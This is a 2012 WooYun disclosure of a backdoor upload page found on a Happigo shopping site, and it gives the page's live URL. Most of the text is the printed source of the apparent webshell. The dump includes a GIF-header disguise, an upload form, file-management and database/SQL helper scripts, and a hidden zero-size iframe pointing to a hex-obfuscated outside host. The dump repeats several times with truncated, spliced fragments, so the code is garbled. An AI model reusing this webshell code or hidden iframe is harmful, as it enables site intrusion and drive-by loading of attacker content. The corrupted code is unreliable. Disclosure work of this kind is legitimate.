当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010629

漏洞标题:快乐购某站被植入后门,上传页面。

相关厂商:快乐购物股份有限公司

漏洞作者: zeracker

提交时间:2012-08-06 13:08

修复时间:2012-08-11 13:09

公开时间:2012-08-11 13:09

漏洞类型:成功的入侵事件

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-08-06: 细节已通知厂商并且等待厂商处理中
2012-08-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

昨天晚上本来打算找漏洞的。
意外发现,居然抓了个后门。
可怜的娃。
我只能说强大的google hacking。

详细说明:

http://posgoo.happigo.com/admin/system/codeigniter/cts.php


gif89a
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}
strong{font-size:12px;}
a:link{color:#0066CC;}
a:hover{color:#FF6600;}
a:visited{color:#003366;}
a:active{color:#9DCC00;}
a{TEXT-DECORATION:none}
table.itable{}
td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style>
</head>
<script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script>
<body>
<center><form enctype="multipart/form-data" method="post" name="upform">
<input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file
onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br>

<br>
<p><br>
</p>
</form>
</center>
<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body><span style="display:none"><iframe src=http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D/admin/jpg.asp width=0 height=0></iframe></body></html></html></body><iframe src= width=0 height=0></iframe></html></body></html><script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("http://%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("E%69%70%67%6F%76%2E%63");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html>
</html></body><iframe src= eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNaeateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!eateMdb"){DName = prompt("请名称,eateMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DNa",FName);top.hideform.FName.value = DNawidth=0 height=0></iframe></html></body></html>
<script language=javascript>function killErrors(){return true;}window.onerror=killErrors;function yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("E%69%70%67%6F%76%2E%63",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'usernafunction yesok(){if (confirm("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html>
</html></body><iframe src= width=0 height=0></iframe></html></body></ht吗?"))return true;else return false;}function runClock(){theTime = window.setTimeout("runClock()", 100);var today = new Date();var display= today.toLocaleString();window.status="!%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D --"+display;}runClock();function ShowFolder(Folder){top.addrform.FolderPath.value = Folder;top.addrform.submit();}function FullForm(FName,FAction){top.hideform.FName.value = FName;if(FAction=="CopyFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFile"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="CopyFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="MoveFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value += "||||"+DName;}else if(FAction=="NewFolder"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D",FName);top.hideform.FName.value = DName;}else if(FAction=="CreateMdb"){DName = prompt("请输入要新建的Mdb文件全名称,注意不能同名!",FName);top.hideform.FName.value = DName;}else if(FAction=="CompactMdb"){DName = prompt("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!",FName);top.hideform.FName.value = DName;}else{DName = "Other";}if(DName!=null){top.hideform.Action.value = FAction;top.hideform.submit();}else{top.hideform.FName.value = "";}}function DbCheck(){if(DbForm.DbStr.value == ""){alert("请先连接数据库");FullDbStr(0);return false;}return true;}function FullDbStr(i){if(i<0){return false;}Str = new Array(12);Str[0] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=D:\\VirtualHost\\343266.ctc-w217.dns.com.cn\\www\\db.mdb;Jet OLEDB:Database Password=***";Str[1] = "Driver={Sql Server};Server=122.70.138.217,1433;Database=DbName;Uid=sa;Pwd=****";Str[2] = "Driver={MySql};Server=122.70.138.217;Port=3306;Database=DbName;Uid=root;Pwd=****";Str[3] = "Dsn=DsnName";Str[4] = "SELECT * FROM [TableName] WHERE ID<100";Str[5] = "INSERT INTO [TableName](USER,PASS) %34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D')";Str[6] = "DELETE FROM [TableName] WHERE ID=100";Str[7] = "UPDATE [TableName] SET USER=\'username\' WHERE ID=100";Str[8] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";Str[9] = "DROP TABLE [TableName]";Str[10]= "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";Str[11]= "ALTER TABLE [TableName] DROP COLUMN PASS";Str[12]= "%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。";if(i<=3){DbForm.DbStr.value = Str[i];DbForm.SqlStr.value = "";abc.innerHTML="<center>%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D。</center>";}else if(i==12){alert(Str[i]);}else{DbForm.SqlStr.value = Str[i];}return true;}function FullSqlStr(str,pg){if(DbForm.DbStr.value.length<5){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}if(str.length<10){alert("%34%30%34%2E%69%70%67%6F%76%2E%63%6F%6D!");return false;}DbForm.SqlStr.value = str;DbForm.Page.value = pg;abc.innerHTML="";DbForm.submit();return true;}</script></body></html></body></html>
<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">body,td{font-family:tahoma,verdana,arial;font-size:11px;line-height:15px;background-color:white;color:#666666;margin-left:20px;}
strong{font-size:12px;}
a:link{color:#0066CC;}
a:hover{color:#FF6600;}
a:visited{color:#003366;}
a:active{color:#9DCC00;}
a{TEXT-DECORATION:none}
table.itable{}
td.irows{height:20px;background:url("index.php?i=dots") repeat-x bottom}</style>
</head>
<script type="text/javascript">function oCopy(obj){obj.select();js=obj.createTextRange();js.execCommand("Copy");};function sendtof(url){window.clipboardData.setData('Text',url);alert('复制地址成功,粘贴给你好友一起分享。');};function select_format(){var on=document.getElementById('fmt').checked;document.getElementById('site').style.display=on?'none':'';document.getElementById('sited').style.display=!on?'none':'';};var flag=false;function DrawImage(ImgD){var image=new Image();image.src=ImgD.src;if(image.width>0&&image.height>0){flag=true;if(image.width/image.height>=120/80){if(image.width>120){ImgD.width=120;ImgD.height=(image.height*120)/image.width;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}else {if(image.height>80){ImgD.height=80;ImgD.width=(image.width*80)/image.height;}else {ImgD.width=image.width;ImgD.height=image.height;};ImgD.alt=image.width+"×"+image.height;}};};function FileChange(Value){flag=false;document.all.uploadimage.width=10;document.all.uploadimage.height=10;document.all.uploadimage.alt="";document.all.uploadimage.src=Value;};</script>
<body>
<center><form enctype="multipart/form-data" method="post" name="upform">
<input style="width:208;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17" name=upfile type=file
onchange="javascript:FileChange(this.value);"><br><input type="submit" value="" style="width:60;border:1 solid #9a9999; font-size:9pt; background-color:#ffffff; height:18" size="17"><br>

<br>
<p><br>
</p>
</form>

漏洞证明:


很明显的一个上传。

修复方案:

清除后门,检查其他网站是否被人植入后门。

版权声明:转载请注明来源 zeracker@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-08-11 13:09

厂商回复:

最新状态:

2012-08-17:已修复